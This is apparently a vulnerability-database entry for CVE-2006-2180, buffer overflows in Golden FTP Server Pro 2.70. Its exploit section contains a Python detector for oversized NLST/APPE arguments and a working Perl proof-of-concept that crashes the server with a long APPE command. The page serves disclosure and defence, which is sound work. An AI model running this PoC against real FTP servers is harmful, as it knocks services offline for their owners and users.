Golden FTP Server Pro Multiple Buffer Overflow Vulnerabilities

Vulnerability ID: 1110205
Vulnerability type: Buffer overflow
Published: 2006-05-03
Updated: 2007-02-20
CVE ID: CVE-2006-2180
CNNVD-ID: CNNVD-200605-072
Platform: Windows
CVSS score: 6.4
|Vulnerability Sources
https://www.exploit-db.com/exploits/1743
https://www.securityfocus.com/bid/17801
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-072
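|Vulnerability Details
Golden FTP Server Pro 2.70 contains buffer overflows. A remote attacker can cause a denial of service (application crash) via a long argument to the (1) NLST or (2) APPE command, as demonstrated by the Infigo FTP Stress Fuzzer.
|Exploit (EXP)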
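An added detection example, not part of the original advisory or of any vendor code: it scans a captured FTP client control-channel stream for NLST or APPE commands whose argument is unusually long. The 512-byte limit, the function name and the sample stream are assumptions constructed for illustration.

```python
import re

# Verbs named in the advisory. The limit is an assumed policy value; the page
# gives no crash threshold (its PoC sends a 3000-byte APPE argument).
WATCHED = {"NLST", "APPE"}
MAX_ARG_BYTES = 512

# RFC 959 control line: 3-4 letter verb, optional SP + argument (CRLF stripped).
_CMD = re.compile(rb"([A-Za-z]{3,4})(?: (.*))?", re.DOTALL)


def inspect(stream: bytes, limit: int = MAX_ARG_BYTES) -> list:
    """Return one finding per suspicious line in a client-to-server byte stream."""
    findings = []
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        m = _CMD.fullmatch(line)
        if m is None:
            # Not a well-formed command line; report it rather than drop it.
            findings.append({"verb": None, "arg_len": len(line),
                             "reason": "unparseable line"})
            continue
        verb = m.group(1).decode("ascii").upper()  # verbs are case-insensitive
        arg = m.group(2) or b""
        if verb in WATCHED and len(arg) > limit:
            findings.append({"verb": verb, "arg_len": len(arg),
                             "reason": "oversized argument"})
    return findings


# Constructed sample stream (filler bytes only, not real traffic).
SAMPLE = b"".join([
    b"USER test\r\n",
    b"PASS test\r\n",
    b"NLST pub\r\n",                    # normal listing request
    b"APPE " + b"x" * 3000 + b"\r\n",   # same length as the PoC argument
    b"nlst " + b"y" * 600 + b"\r\n",    # lower-case verb, still over the limit
    b"QUIT\r\n",
])

if __name__ == "__main__":
    for finding in inspect(SAMPLE):
        print(finding)
```

The same length check can be enforced in an FTP-aware proxy or IDS rule placed in front of a server that cannot be patched or replaced.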
#!/usr/bin/perl

# -----------------------------------------------------------------------------------------
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
# -----------------------------------------------------------------------------------------

use Net::FTP;

$host = $ARGV[0];
$port = $ARGV[1];
$debug = $ARGV[2];
$user = $ARGV[3];
$pass = $ARGV[4];

if (($host) && ($port)) {

# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;

      print "Trying to connect to $host:$port\n";
      $sock = Net::FTP->new("$host", Port => $port, Timeout => 60, Debug => $debug) or die "[-] Connection failed\n";
      print "[+] Connect OK!\n";
      print "Logging...\n";
      if (!$user) {
           $user = "test";
           $pass = "test";
      }
      $sock->login($user, $pass);
      sleep(1);
      $answer = $sock->message;
      print $answer ."\n";
      print "Sending string...\n";
      $sock->quot("APPE",$exploit_string);
} else {
      print "Golden FTP Server Pro 2.70 - Remote APPE command PoC exploit : DoS\nhttps://www.securinfos.info\n\nUsing: $0 host port [debug: 1 or 0] username password\n\n";
}

# milw0rm.com [2006-05-03]
|Affected Products
Golden FTP Server Golden FTP Server 2.70
|References

Source: XF
Name: goldenftp-nlst-appe-bo(26195)
Link: http://xforce.iss.net/xforce/xfdb/26195
Source: BID
Name: 17801
Link: http://www.securityfocus.com/bid/17801
Source: OSVDB
Name: 25217
Link: http://www.osvdb.org/25217
Source: MISC
Link: http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03
Source: MISC
Link: http://www.infigo.hr/en/in_focus/tools
Source: VUPEN
Name: ADV-2006-1640
Link: http://www.frsirt.com/english/advisories/2006/1640
Source: SECUNIA
Name: 19917
Link: http://secunia.com/advisories/19917
Source: BUGTRAQ
Name: 20060502 FTP Fuzzer
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=114658586018818&w=2
Source: BUGTRAQ
Name: 20060508 INFIGO-2006-05-03: Multiple FTP Servers vulnerabilities
Link: http://archives.neohapsis.com/archives/bugtraq/2006-05/0139.html